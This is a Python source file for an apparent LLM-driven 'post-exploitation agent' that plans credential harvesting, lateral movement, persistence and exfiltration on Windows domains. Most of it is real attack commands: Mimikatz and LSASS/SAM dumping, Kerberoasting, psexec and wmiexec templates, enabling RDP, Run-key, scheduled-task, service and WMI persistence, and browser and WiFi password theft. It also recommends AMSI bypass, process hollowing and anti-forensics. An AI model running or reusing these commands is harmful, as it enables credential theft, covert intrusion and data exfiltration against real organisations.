|
""" |
|
Cyber-LLM Post-Exploitation Agent |
|
|
|
Handles credential harvesting, lateral movement, and persistence operations. |
|
Integrates with Mimikatz, BloodHound, and post-exploitation frameworks. |
|
|
|
Author: Muzan Sano |
|
Email: [email protected] |
|
""" |
|
|
|
import json |
|
import logging |
|
import subprocess |
|
from typing import Dict, List, Any, Optional |
|
from dataclasses import dataclass |
|
from pydantic import BaseModel |
|
import yaml |
|
from datetime import datetime |
|
|
|
|
|
logging.basicConfig(level=logging.INFO) |
|
logger = logging.getLogger(__name__) |
|
|
|
class PostExploitRequest(BaseModel): |
|
target_system: str |
|
access_level: str |
|
objectives: List[str] |
|
constraints: Dict[str, Any] |
|
stealth_mode: bool = True |
|
|
|
class PostExploitResponse(BaseModel): |
|
credential_harvest: Dict[str, Any] |
|
lateral_movement: Dict[str, Any] |
|
persistence: Dict[str, Any] |
|
exfiltration: Dict[str, Any] |
|
command_sequence: List[str] |
|
risk_assessment: Dict[str, Any] |
|
|
|
class PostExploitAgent: |
|
""" |
|
Advanced post-exploitation agent for credential harvesting, |
|
lateral movement, and persistence establishment. |
|
""" |
|
|
|
def __init__(self, config_path: Optional[str] = None): |
|
self.config = self._load_config(config_path) |
|
self.techniques = self._load_techniques() |
|
self.persistence_methods = self._load_persistence_methods() |
|
|
|
def _load_config(self, config_path: Optional[str]) -> Dict[str, Any]: |
|
"""Load post-exploitation configuration.""" |
|
if config_path: |
|
with open(config_path, 'r') as f: |
|
return yaml.safe_load(f) |
|
return { |
|
"max_execution_time": 3600, |
|
"cleanup_on_exit": True, |
|
"log_operations": True |
|
} |
|
|
|
def _load_techniques(self) -> Dict[str, Any]: |
|
"""Load post-exploitation techniques database.""" |
|
return { |
|
"credential_harvest": { |
|
"mimikatz": { |
|
"technique": "T1003.001", |
|
"commands": [ |
|
"privilege::debug", |
|
"sekurlsa::logonpasswords", |
|
"sekurlsa::wdigest", |
|
"sekurlsa::kerberos", |
|
"sekurlsa::tspkg" |
|
], |
|
"detection_risk": "high", |
|
"requirements": ["admin_rights", "debug_privilege"] |
|
}, |
|
"lsass_dump": { |
|
"technique": "T1003.001", |
|
"commands": [ |
|
"rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump [PID] C:\\temp\\lsass.dmp full", |
|
"reg save HKLM\\sam C:\\temp\\sam.hive", |
|
"reg save HKLM\\security C:\\temp\\security.hive", |
|
"reg save HKLM\\system C:\\temp\\system.hive" |
|
], |
|
"detection_risk": "medium", |
|
"requirements": ["admin_rights"] |
|
}, |
|
"kerberoasting": { |
|
"technique": "T1558.003", |
|
"commands": [ |
|
"powershell -ep bypass", |
|
"Import-Module .\\PowerView.ps1", |
|
"Get-DomainUser -SPN | Get-DomainSPNTicket -Format Hashcat", |
|
"Invoke-Kerberoast -OutputFormat HashCat" |
|
], |
|
"detection_risk": "low", |
|
"requirements": ["domain_user"] |
|
} |
|
}, |
|
"lateral_movement": { |
|
"psexec": { |
|
"technique": "T1021.002", |
|
"command_template": "psexec.exe \\\\{target} -u {domain}\\{user} -p {password} cmd.exe", |
|
"detection_risk": "high", |
|
"requirements": ["admin_creds", "smb_access"] |
|
}, |
|
"wmiexec": { |
|
"technique": "T1047", |
|
"command_template": "wmiexec.py {domain}/{user}:{password}@{target}", |
|
"detection_risk": "medium", |
|
"requirements": ["admin_creds", "wmi_access"] |
|
}, |
|
"rdp": { |
|
"technique": "T1021.001", |
|
"commands": [ |
|
"reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f", |
|
"netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes" |
|
], |
|
"detection_risk": "medium", |
|
"requirements": ["admin_rights"] |
|
} |
|
}, |
|
"privilege_escalation": { |
|
"uac_bypass": { |
|
"technique": "T1548.002", |
|
"methods": ["fodhelper", "computerdefaults", "sdclt"], |
|
"detection_risk": "low" |
|
}, |
|
"token_impersonation": { |
|
"technique": "T1134", |
|
"commands": [ |
|
"list tokens", |
|
"impersonate_token {token}", |
|
"getuid" |
|
], |
|
"detection_risk": "medium" |
|
} |
|
} |
|
} |
|
|
|
def _load_persistence_methods(self) -> Dict[str, Any]: |
|
"""Load persistence techniques.""" |
|
return { |
|
"registry_run_keys": { |
|
"technique": "T1547.001", |
|
"commands": [ |
|
"reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v {name} /t REG_SZ /d {payload_path}", |
|
"reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v {name} /t REG_SZ /d {payload_path}" |
|
], |
|
"detection_risk": "medium", |
|
"cleanup": "reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v {name} /f" |
|
}, |
|
"scheduled_task": { |
|
"technique": "T1053.005", |
|
"commands": [ |
|
"schtasks /create /tn {task_name} /tr {payload_path} /sc onlogon /ru system", |
|
"schtasks /run /tn {task_name}" |
|
], |
|
"detection_risk": "low", |
|
"cleanup": "schtasks /delete /tn {task_name} /f" |
|
}, |
|
"service_creation": { |
|
"technique": "T1543.003", |
|
"commands": [ |
|
"sc create {service_name} binpath= {payload_path} start= auto", |
|
"sc start {service_name}" |
|
], |
|
"detection_risk": "high", |
|
"cleanup": "sc delete {service_name}" |
|
}, |
|
"wmi_event": { |
|
"technique": "T1546.003", |
|
"commands": [ |
|
"powershell -c \"Register-WmiEvent -Query \\\"SELECT * FROM Win32_LogonSession\\\" -Action { Start-Process {payload_path} }\"" |
|
], |
|
"detection_risk": "low", |
|
"cleanup": "powershell -c \"Get-WmiEvent | Unregister-Event\"" |
|
} |
|
} |
|
|
|
def analyze_bloodhound_data(self, bloodhound_json: Optional[str] = None) -> Dict[str, Any]: |
|
""" |
|
Analyze BloodHound data for lateral movement opportunities. |
|
|
|
# HUMAN_APPROVAL_REQUIRED: Review lateral movement paths before execution |
|
""" |
|
|
|
analysis = { |
|
"high_value_targets": [ |
|
{"name": "DC01.domain.local", "type": "Domain Controller", "priority": 1}, |
|
{"name": "SQL01.domain.local", "type": "Database Server", "priority": 2}, |
|
{"name": "FILE01.domain.local", "type": "File Server", "priority": 3} |
|
], |
|
"attack_paths": [ |
|
{ |
|
"path": "Current User -> Domain Admins", |
|
"steps": [ |
|
"Kerberoast service accounts", |
|
"Crack obtained hashes", |
|
"Move to SQL01 with service account", |
|
"Escalate via SQLi to SYSTEM", |
|
"Extract cached domain admin credentials" |
|
], |
|
"difficulty": "medium", |
|
"detection_risk": "medium" |
|
} |
|
], |
|
"vulnerable_accounts": [ |
|
{"name": "svc-sql", "type": "Service Account", "spn": True, "admin": False}, |
|
{"name": "backup-svc", "type": "Service Account", "spn": True, "admin": True} |
|
], |
|
"group_memberships": { |
|
"domain_admins": ["administrator", "da-backup"], |
|
"server_operators": ["svc-backup", "svc-sql"], |
|
"account_operators": ["helpdesk1", "helpdesk2"] |
|
} |
|
} |
|
|
|
return analysis |
|
|
|
def plan_credential_harvest(self, access_level: str, stealth_mode: bool) -> Dict[str, Any]: |
|
"""Plan credential harvesting operations based on access level.""" |
|
harvest_plan = { |
|
"primary_techniques": [], |
|
"secondary_techniques": [], |
|
"stealth_considerations": [], |
|
"detection_risks": [] |
|
} |
|
|
|
if access_level in ["admin", "system"]: |
|
|
|
if stealth_mode: |
|
harvest_plan["primary_techniques"].extend([ |
|
self.techniques["credential_harvest"]["lsass_dump"], |
|
self.techniques["credential_harvest"]["kerberoasting"] |
|
]) |
|
harvest_plan["stealth_considerations"].extend([ |
|
"Use process hollowing to avoid direct Mimikatz execution", |
|
"Implement AMSI bypass techniques", |
|
"Use legitimate admin tools where possible" |
|
]) |
|
else: |
|
harvest_plan["primary_techniques"].append( |
|
self.techniques["credential_harvest"]["mimikatz"] |
|
) |
|
|
|
else: |
|
|
|
harvest_plan["primary_techniques"].append( |
|
self.techniques["credential_harvest"]["kerberoasting"] |
|
) |
|
harvest_plan["secondary_techniques"].extend([ |
|
{ |
|
"technique": "Browser Credential Extraction", |
|
"commands": ["powershell -c \"Get-ChromePasswords\""], |
|
"detection_risk": "low" |
|
}, |
|
{ |
|
"technique": "WiFi Password Extraction", |
|
"commands": ["netsh wlan show profiles", "netsh wlan show profile {profile} key=clear"], |
|
"detection_risk": "very_low" |
|
} |
|
]) |
|
|
|
return harvest_plan |
|
|
|
def plan_lateral_movement(self, bloodhound_analysis: Dict[str, Any], credentials: List[Dict[str, Any]]) -> Dict[str, Any]: |
|
"""Plan lateral movement strategy based on BloodHound analysis and available credentials.""" |
|
|
|
movement_plan = { |
|
"target_systems": [], |
|
"movement_techniques": [], |
|
"escalation_path": [], |
|
"operational_notes": [] |
|
} |
|
|
|
|
|
for target in bloodhound_analysis["high_value_targets"]: |
|
movement_plan["target_systems"].append({ |
|
"hostname": target["name"], |
|
"priority": target["priority"], |
|
"access_methods": ["wmiexec", "psexec", "rdp"], |
|
"required_creds": "admin" |
|
}) |
|
|
|
|
|
if any(cred.get("admin", False) for cred in credentials): |
|
movement_plan["movement_techniques"].extend([ |
|
self.techniques["lateral_movement"]["wmiexec"], |
|
self.techniques["lateral_movement"]["psexec"] |
|
]) |
|
else: |
|
movement_plan["movement_techniques"].append({ |
|
"technique": "T1021.004", |
|
"name": "SSH Lateral Movement", |
|
"command_template": "ssh {user}@{target}", |
|
"detection_risk": "low" |
|
}) |
|
|
|
|
|
for path in bloodhound_analysis["attack_paths"]: |
|
movement_plan["escalation_path"].append({ |
|
"path_name": path["path"], |
|
"steps": path["steps"], |
|
"estimated_time": "2-4 hours", |
|
"required_tools": ["PowerView", "Invoke-Kerberoast", "Hashcat"] |
|
}) |
|
|
|
return movement_plan |
|
|
|
def plan_persistence(self, access_level: str, stealth_mode: bool) -> Dict[str, Any]: |
|
"""Plan persistence mechanisms based on access level and stealth requirements.""" |
|
|
|
persistence_plan = { |
|
"primary_methods": [], |
|
"backup_methods": [], |
|
"cleanup_commands": [], |
|
"monitoring_evasion": [] |
|
} |
|
|
|
if access_level in ["admin", "system"]: |
|
if stealth_mode: |
|
|
|
persistence_plan["primary_methods"].extend([ |
|
self.persistence_methods["wmi_event"], |
|
self.persistence_methods["scheduled_task"] |
|
]) |
|
else: |
|
|
|
persistence_plan["primary_methods"].extend([ |
|
self.persistence_methods["service_creation"], |
|
self.persistence_methods["registry_run_keys"] |
|
]) |
|
else: |
|
|
|
persistence_plan["primary_methods"].append( |
|
self.persistence_methods["registry_run_keys"] |
|
) |
|
|
|
|
|
for method in persistence_plan["primary_methods"]: |
|
if "cleanup" in method: |
|
persistence_plan["cleanup_commands"].append(method["cleanup"]) |
|
|
|
return persistence_plan |
|
|
|
def assess_detection_risk(self, operations: List[Dict[str, Any]]) -> Dict[str, Any]: |
|
"""Assess overall detection risk of planned operations.""" |
|
|
|
risk_levels = {"very_low": 1, "low": 2, "medium": 3, "high": 4, "very_high": 5} |
|
total_risk = 0 |
|
operation_count = 0 |
|
|
|
high_risk_operations = [] |
|
|
|
for operation in operations: |
|
if "detection_risk" in operation: |
|
risk_score = risk_levels.get(operation["detection_risk"], 3) |
|
total_risk += risk_score |
|
operation_count += 1 |
|
|
|
if risk_score >= 4: |
|
high_risk_operations.append(operation.get("name", "Unknown Operation")) |
|
|
|
average_risk = total_risk / max(operation_count, 1) |
|
|
|
risk_assessment = { |
|
"overall_risk_score": average_risk, |
|
"risk_level": "HIGH" if average_risk >= 3.5 else "MEDIUM" if average_risk >= 2.5 else "LOW", |
|
"high_risk_operations": high_risk_operations, |
|
"recommendations": [] |
|
} |
|
|
|
if average_risk >= 3.5: |
|
risk_assessment["recommendations"].extend([ |
|
"Consider using living-off-the-land techniques", |
|
"Implement anti-forensics measures", |
|
"Use process hollowing and injection techniques", |
|
"Rotate tools and techniques frequently" |
|
]) |
|
|
|
return risk_assessment |
|
|
|
def execute_post_exploitation(self, request: PostExploitRequest) -> PostExploitResponse: |
|
""" |
|
Execute complete post-exploitation workflow. |
|
|
|
# HUMAN_APPROVAL_REQUIRED: Review post-exploitation plan before execution |
|
""" |
|
logger.info(f"Starting post-exploitation on {request.target_system}") |
|
|
|
|
|
bloodhound_analysis = self.analyze_bloodhound_data() |
|
|
|
|
|
credential_harvest = self.plan_credential_harvest(request.access_level, request.stealth_mode) |
|
|
|
|
|
mock_credentials = [ |
|
{"username": "svc-sql", "password": "Service123!", "domain": "domain.local", "admin": False}, |
|
{"username": "backup-svc", "password": "Backup456!", "domain": "domain.local", "admin": True} |
|
] |
|
|
|
lateral_movement = self.plan_lateral_movement(bloodhound_analysis, mock_credentials) |
|
persistence = self.plan_persistence(request.access_level, request.stealth_mode) |
|
|
|
|
|
command_sequence = [] |
|
|
|
|
|
for technique in credential_harvest["primary_techniques"]: |
|
command_sequence.extend(technique.get("commands", [])) |
|
|
|
|
|
for technique in lateral_movement["movement_techniques"]: |
|
if "command_template" in technique: |
|
command_sequence.append(f"# {technique.get('name', 'Lateral Movement')}") |
|
command_sequence.append(technique["command_template"]) |
|
|
|
|
|
for method in persistence["primary_methods"]: |
|
command_sequence.extend(method.get("commands", [])) |
|
|
|
|
|
all_operations = (credential_harvest["primary_techniques"] + |
|
lateral_movement["movement_techniques"] + |
|
persistence["primary_methods"]) |
|
risk_assessment = self.assess_detection_risk(all_operations) |
|
|
|
|
|
exfiltration = { |
|
"methods": ["DNS tunneling", "HTTPS upload", "Email exfiltration"], |
|
"targets": [ |
|
"C:\\Users\\*\\Documents\\*.doc*", |
|
"C:\\Users\\*\\Desktop\\*.pdf", |
|
"Registry hives", |
|
"Browser saved passwords" |
|
], |
|
"staging_location": "C:\\Windows\\Temp\\update.log", |
|
"encryption": "AES-256", |
|
"compression": True |
|
} |
|
|
|
response = PostExploitResponse( |
|
credential_harvest=credential_harvest, |
|
lateral_movement=lateral_movement, |
|
persistence=persistence, |
|
exfiltration=exfiltration, |
|
command_sequence=command_sequence, |
|
risk_assessment=risk_assessment |
|
) |
|
|
|
logger.info(f"Post-exploitation plan complete for {request.target_system}") |
|
return response |
|
|
|
def main(): |
|
"""CLI interface for PostExploitAgent.""" |
|
import argparse |
|
|
|
parser = argparse.ArgumentParser(description="Cyber-LLM Post-Exploitation Agent") |
|
parser.add_argument("--target", required=True, help="Target system identifier") |
|
parser.add_argument("--access-level", choices=["user", "admin", "system"], |
|
default="user", help="Current access level") |
|
parser.add_argument("--objectives", nargs="+", default=["credential_harvest", "lateral_movement"], |
|
help="Post-exploitation objectives") |
|
parser.add_argument("--stealth", action="store_true", help="Enable stealth mode") |
|
parser.add_argument("--config", help="Path to configuration file") |
|
parser.add_argument("--output", help="Output file for results") |
|
|
|
args = parser.parse_args() |
|
|
|
|
|
agent = PostExploitAgent(config_path=args.config) |
|
|
|
|
|
request = PostExploitRequest( |
|
target_system=args.target, |
|
access_level=args.access_level, |
|
objectives=args.objectives, |
|
constraints={}, |
|
stealth_mode=args.stealth |
|
) |
|
|
|
|
|
response = agent.execute_post_exploitation(request) |
|
|
|
|
|
result = { |
|
"target": args.target, |
|
"credential_harvest": response.credential_harvest, |
|
"lateral_movement": response.lateral_movement, |
|
"persistence": response.persistence, |
|
"exfiltration": response.exfiltration, |
|
"command_sequence": response.command_sequence, |
|
"risk_assessment": response.risk_assessment |
|
} |
|
|
|
if args.output: |
|
with open(args.output, 'w') as f: |
|
json.dump(result, f, indent=2) |
|
print(f"Post-exploitation plan saved to {args.output}") |
|
else: |
|
print(json.dumps(result, indent=2)) |
|
|
|
if __name__ == "__main__": |
|
main() |
|
|